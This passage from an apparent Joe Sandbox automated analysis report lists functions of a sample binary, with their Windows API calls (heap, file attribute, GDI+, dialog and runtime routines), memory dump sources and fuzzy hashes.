Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008C1098,008817CE,?,?,00000007,?,?,?,008813D6,?,00000000), ref: 008A8EB1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 2aece57d0d8ba0864c1848fa12fca0bf01150565a96c16c83a84dc23a7442f19
Instruction ID: 804a14b939034d0c0276fe242f7fff0f116c127d3a3af78f23cdbda5a7d9223f
Opcode Fuzzy Hash: 2aece57d0d8ba0864c1848fa12fca0bf01150565a96c16c83a84dc23a7442f19
Instruction Fuzzy Hash: 64F0F632601115E6FB212A699C04B6F7B58FF93B70F640125F814EAD91DF70DD2091B1

Uniqueness

Uniqueness Score: -1.00%

Function 0089109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 008910AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 008910B2

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 874a0dc582ed2c8409eff1ab7d54d025bb5ee566f620c28b5a67f409497af46a
Instruction ID: 6e19b1d062f089252fbaf64cddf92562a34c7e37bd482a995652a473d4ef2d77
Opcode Fuzzy Hash: 874a0dc582ed2c8409eff1ab7d54d025bb5ee566f620c28b5a67f409497af46a
Instruction Fuzzy Hash: B8E0D832F0094AA7DF09A7B49C098EB73DDFA442043184175E403D3101F931DE424A60

Uniqueness

Uniqueness Score: -1.00%

Function 008A8268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 008ABF30: GetEnvironmentStringsW.KERNEL32 ref: 008ABF39
Part of subcall function 008ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008ABF5C
Part of subcall function 008ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008ABF82
Part of subcall function 008ABF30: _free.LIBCMT ref: 008ABF95
Part of subcall function 008ABF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008ABFA4

_free.LIBCMT ref: 008A82AE
_free.LIBCMT ref: 008A82B5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 2642b78f341f11d3098c2c689fcc5a630fb3a2890eceef47484237bbc02befbc
Instruction ID: 0722d33a9c342ce78cebb11309a25d263c39cd94991073df543b595258edd631
Opcode Fuzzy Hash: 2642b78f341f11d3098c2c689fcc5a630fb3a2890eceef47484237bbc02befbc
Instruction Fuzzy Hash: 00E06D63A06D92D5B661327E6C4277B1608FB83378F550226FB20DB8C3DE50880645B7

Uniqueness

Uniqueness Score: -1.00%

Function 0088A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501

Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: a7d204b937b8fc9bb087fdcb7124bebc095ccf32d24807705259e786dbe940ee
Instruction ID: f3012db2c55a278b433b42355fc8f5693e50e42c3ce5a8ae8e5b81771a157e09
Opcode Fuzzy Hash: a7d204b937b8fc9bb087fdcb7124bebc095ccf32d24807705259e786dbe940ee
Instruction Fuzzy Hash: FEF0A03124010ABBEF016F60DC41FDA376CFF04385F488051B844D5160DB31EAD5DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0088A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641,000000FF), ref: 0088A1F1

Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641), ref: 0088A21F

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 136c3c39d4aedfd541956a3f49dd5dcaf827fe4f9eb82d0387f24a5a5a9c6e37
Instruction ID: e7064c559b8e5a3f805d41c10283807776a513d77457aa4de696e8a629ab139d
Opcode Fuzzy Hash: 136c3c39d4aedfd541956a3f49dd5dcaf827fe4f9eb82d0387f24a5a5a9c6e37
Instruction Fuzzy Hash: 2DE092311442096BEB11BF64DC45FDD775CFF08385F484061B944E2090EB61DE85DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0089AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,008B2641,000000FF), ref: 0089ACB0
OleUninitialize.OLE32(?,?,?,?,008B2641,000000FF), ref: 0089ACB5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 12317a4c07d4bb1289b8af8d9f35e0253441ba867ed808b908dfbcf8a8b3cd8e
Instruction ID: 27d68f5229bfb9cdb386b07a03c13d200503a9a5b9a885fbae1d6f2c9e2fcf60
Opcode Fuzzy Hash: 12317a4c07d4bb1289b8af8d9f35e0253441ba867ed808b908dfbcf8a8b3cd8e
Instruction Fuzzy Hash: 2BE06D72644650EFCB01EB5CDC46B49FBA9FB89B20F04436AF416D37A0CB74AC00CA94

Uniqueness

Uniqueness Score: -1.00%

Function 0088A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0088A23A,?,0088755C,?,?,?,?), ref: 0088A254

Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0088A23A,?,0088755C,?,?,?,?), ref: 0088A280

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: eee861976c6e580dcf0a121df4085227b239349b29f630a8163e5c3cae9b7c32
Instruction ID: f0a7ff0d7d600fd555ed5b1143d5821445c7a1fb189b57daf83ba3f82d615951
Opcode Fuzzy Hash: eee861976c6e580dcf0a121df4085227b239349b29f630a8163e5c3cae9b7c32
Instruction Fuzzy Hash: 9EE092315001289BDB20BB68CC05BD97B58FB183E1F044261FD44E31D0D770DE45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0089DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0089DEEC

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

SetDlgItemTextW.USER32(00000065,?), ref: 0089DF03

Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 685856b9213dd0ca399837e4da7cd5449b6eb5e6abd90a5f0ecde559ce6bfae8
Instruction ID: c2391e393572009512b021594c4abb8b6304708fddf4cbe2bc5e334d57ee2355
Opcode Fuzzy Hash: 685856b9213dd0ca399837e4da7cd5449b6eb5e6abd90a5f0ecde559ce6bfae8
Instruction Fuzzy Hash: 98E09B72404248A6DF01B764DC06F9F3B6CBB15785F040451B640DB0A2D974DA108766

Uniqueness

Uniqueness Score: -1.00%

Function 0089081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 8ee981911c922ce52295662b06904de1daab71428865e3bd9c2529fe25154187
Instruction ID: 7bd03da0e7c84895e1994dbab085862c834600add39f67f6edda2913994ec653
Opcode Fuzzy Hash: 8ee981911c922ce52295662b06904de1daab71428865e3bd9c2529fe25154187
Instruction Fuzzy Hash: 72E04876504118BBDF11B794DC05FDA7BACFF093D1F0400657645E2104DA74DA84CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0089A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0089A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0089A3E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: fe9e487c1ce3c18a641265baf1a5c3744cd87d548c011b96ca4c60969fa00cc6
Instruction ID: 206e326ee75c50847ef7a0edef576adfca72f97ac56ef8f5e6d96f60239a0681
Opcode Fuzzy Hash: fe9e487c1ce3c18a641265baf1a5c3744cd87d548c011b96ca4c60969fa00cc6
Instruction Fuzzy Hash: 06E0ED71500218EBCB14EF99C5417A9BBE8FB04364F24C05AA846E3301E774AE04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 008A2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008A2BB5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 52754cb5ef039c194090b1fba73e92bb41ab13bdc5bc6b3b0ef91246af8615e6
Instruction ID: 0fa7643553d242cde732b7cd3eaa09174968f641aeb8551d4cf18846377d1123
Opcode Fuzzy Hash: 52754cb5ef039c194090b1fba73e92bb41ab13bdc5bc6b3b0ef91246af8615e6
Instruction Fuzzy Hash: 50D0A934294214DB7C347A7C29025882349FE53B747A053CAF431D5DC1EE189042A032

Uniqueness

Uniqueness Score: -1.00%

Function 008812F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00881306
ShowWindow.USER32(00000000), ref: 0088130D

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: c43497c8fb3f333143ad1fcd7bfd1a863f6384fdef2f12bfc4e7d6a48a1ad835
Instruction ID: 355139224975fc97c531ae3b6ff7ada7ecb77dc992a3c37ee2e9649771753714
Opcode Fuzzy Hash: c43497c8fb3f333143ad1fcd7bfd1a863f6384fdef2f12bfc4e7d6a48a1ad835
Instruction Fuzzy Hash: 71C0123205C280BECB020BB4DC0DC2BBBA8BBA5312F04C90CB0B5C2060C238CA10DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00881A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00881A09

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ad737915ae8722737d3c8a24d1410e6879a9eac55db7501e4463be4a93be3366
Instruction ID: e8bd0d1a5e14cb3672a960d7c5fdefcf2dca8f952a5812d27c87ac5d958d6d92
Opcode Fuzzy Hash: ad737915ae8722737d3c8a24d1410e6879a9eac55db7501e4463be4a93be3366
Instruction Fuzzy Hash: 5BC18070A002549FEF15EF68C498BA97BAAFF15320F0805B9EC45DB396DF309946CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00883BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00883BBF

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5bcf4d6e1d2db3892add95a8b3fa606e60fe0cfd99974458118088e8523ef53
Instruction ID: aacbf592e65901a2934b6a4e72866bb4481f6bd8df9249414931b48d163deba1
Opcode Fuzzy Hash: e5bcf4d6e1d2db3892add95a8b3fa606e60fe0cfd99974458118088e8523ef53
Instruction Fuzzy Hash: C871C071540F449EDB35EB74C8459E7B7E9FB14700F40092EE2ABC7642DA326A88DF12

Uniqueness

Uniqueness Score: -1.00%

Function 00888284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00888289

Part of subcall function 008813DC: __EH_prolog.LIBCMT ref: 008813E1

Part of subcall function 0088A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: f36b23627c6e8992969b79a7ebe89c1fa71b24f6372e601338af62d09fa3829a
Instruction ID: 340d058e70b1f4bd7150e4b3aa8172507329068448bb8d62d086b1da485c046d
Opcode Fuzzy Hash: f36b23627c6e8992969b79a7ebe89c1fa71b24f6372e601338af62d09fa3829a
Instruction Fuzzy Hash: CA4195719446589ADB24FBA4CC55AEAB368FF10304F4404EAE18AE7183EF755E85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 008813E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008813E1

Part of subcall function 00885E37: __EH_prolog.LIBCMT ref: 00885E3C

Part of subcall function 0088CE40: __EH_prolog.LIBCMT ref: 0088CE45

Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 24adb285eb43ccea63aa3fa3b8f84febb5e5ba828e2eb3eae76219a21f00ae1b
Instruction ID: 005fb82f1e741aad7c4fe1e15f16d7485f74b228de14834446924e9b60a956ca
Opcode Fuzzy Hash: 24adb285eb43ccea63aa3fa3b8f84febb5e5ba828e2eb3eae76219a21f00ae1b
Instruction Fuzzy Hash: 224149B0905B409EE724DF798885AE6FBE5FF18310F54492ED5EEC3282CB316654CB15

Uniqueness

Uniqueness Score: -1.00%

Function 008813DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008813E1

Part of subcall function 00885E37: __EH_prolog.LIBCMT ref: 00885E3C

Part of subcall function 0088CE40: __EH_prolog.LIBCMT ref: 0088CE45

Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 09269a717e6475dbcc3b2b6f15979d1dfc0f00f6ef3544c37ad900273fce02f5
Instruction ID: f4f997a682e335aff79cf6bb3783ec1d0fe939b916b0cb24b4429cfa4101f4e5
